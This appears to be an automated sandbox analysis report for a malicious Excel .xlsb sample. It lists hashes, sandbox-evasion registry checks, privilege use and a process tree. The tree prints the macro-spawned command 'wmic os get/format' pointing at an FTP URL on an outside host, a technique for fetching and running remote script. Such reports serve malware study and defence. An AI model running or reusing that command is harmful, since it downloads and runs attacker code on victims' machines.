Analysis
-
max time kernel
149s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12-04-2023 04:05
Behavioral task
behavioral1
Sample
b846fa8bc3a55fa0490a807186a8ece9.xlsb
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
b846fa8bc3a55fa0490a807186a8ece9.xlsb
Resource
win10v2004-20230220-en
General
-
Target
b846fa8bc3a55fa0490a807186a8ece9.xlsb
-
Size
79KB
-
MD5
b846fa8bc3a55fa0490a807186a8ece9
-
SHA1
c0c6b99796d732fa53402ff49fd241612a340229
-
SHA256
855656bfecc359a1816437223c4a133359e73ecf45acda667610fbe7875ab3c8
-
SHA512
18fb97b1a198b4a1336d52e5a363b44ef2d73875fe3b9f6828349403a2b80bcb8e432a37f4672d0f4224d70f28d5112ee897da692e1dc3a02edbf55576b64681
-
SSDEEP
1536:s1YKo7aGH8sVHLPzWm4z5eDr6tMEpQGzGo+47hPOV4ko+dNT6MuSS98X:+o7VcsVrd4zC6tMEpso+eE/eMzS6
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3344 444 cmd.exe EXCEL.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 444 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
WMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 4716 WMIC.exe Token: SeSecurityPrivilege 4716 WMIC.exe Token: SeTakeOwnershipPrivilege 4716 WMIC.exe Token: SeLoadDriverPrivilege 4716 WMIC.exe Token: SeSystemProfilePrivilege 4716 WMIC.exe Token: SeSystemtimePrivilege 4716 WMIC.exe Token: SeProfSingleProcessPrivilege 4716 WMIC.exe Token: SeIncBasePriorityPrivilege 4716 WMIC.exe Token: SeCreatePagefilePrivilege 4716 WMIC.exe Token: SeBackupPrivilege 4716 WMIC.exe Token: SeRestorePrivilege 4716 WMIC.exe Token: SeShutdownPrivilege 4716 WMIC.exe Token: SeDebugPrivilege 4716 WMIC.exe Token: SeSystemEnvironmentPrivilege 4716 WMIC.exe Token: SeRemoteShutdownPrivilege 4716 WMIC.exe Token: SeUndockPrivilege 4716 WMIC.exe Token: SeManageVolumePrivilege 4716 WMIC.exe Token: 33 4716 WMIC.exe Token: 34 4716 WMIC.exe Token: 35 4716 WMIC.exe Token: 36 4716 WMIC.exe Token: SeIncreaseQuotaPrivilege 4716 WMIC.exe Token: SeSecurityPrivilege 4716 WMIC.exe Token: SeTakeOwnershipPrivilege 4716 WMIC.exe Token: SeLoadDriverPrivilege 4716 WMIC.exe Token: SeSystemProfilePrivilege 4716 WMIC.exe Token: SeSystemtimePrivilege 4716 WMIC.exe Token: SeProfSingleProcessPrivilege 4716 WMIC.exe Token: SeIncBasePriorityPrivilege 4716 WMIC.exe Token: SeCreatePagefilePrivilege 4716 WMIC.exe Token: SeBackupPrivilege 4716 WMIC.exe Token: SeRestorePrivilege 4716 WMIC.exe Token: SeShutdownPrivilege 4716 WMIC.exe Token: SeDebugPrivilege 4716 WMIC.exe Token: SeSystemEnvironmentPrivilege 4716 WMIC.exe Token: SeRemoteShutdownPrivilege 4716 WMIC.exe Token: SeUndockPrivilege 4716 WMIC.exe Token: SeManageVolumePrivilege 4716 WMIC.exe Token: 33 4716 WMIC.exe Token: 34 4716 WMIC.exe Token: 35 4716 WMIC.exe Token: 36 4716 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 444 EXCEL.EXE 444 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE 444 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 444 wrote to memory of 3344 444 EXCEL.EXE cmd.exe PID 444 wrote to memory of 3344 444 EXCEL.EXE cmd.exe PID 3344 wrote to memory of 4716 3344 cmd.exe WMIC.exe PID 3344 wrote to memory of 4716 3344 cmd.exe WMIC.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b846fa8bc3a55fa0490a807186a8ece9.xlsb"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /cwmic os get/format:"ftp://0:0@trip.greenulz.com/profile/frontend"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic os get/format:"ftp://0:0@trip.greenulz.com/profile/frontend"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/444-133-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmpFilesize
64KB
-
memory/444-135-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmpFilesize
64KB
-
memory/444-134-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmpFilesize
64KB
-
memory/444-136-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmpFilesize
64KB
-
memory/444-137-0x00007FFE98C30000-0x00007FFE98C40000-memory.dmpFilesize
64KB
-
memory/444-138-0x00007FFE96750000-0x00007FFE96760000-memory.dmpFilesize
64KB
-
memory/444-139-0x00007FFE96750000-0x00007FFE96760000-memory.dmpFilesize
64KB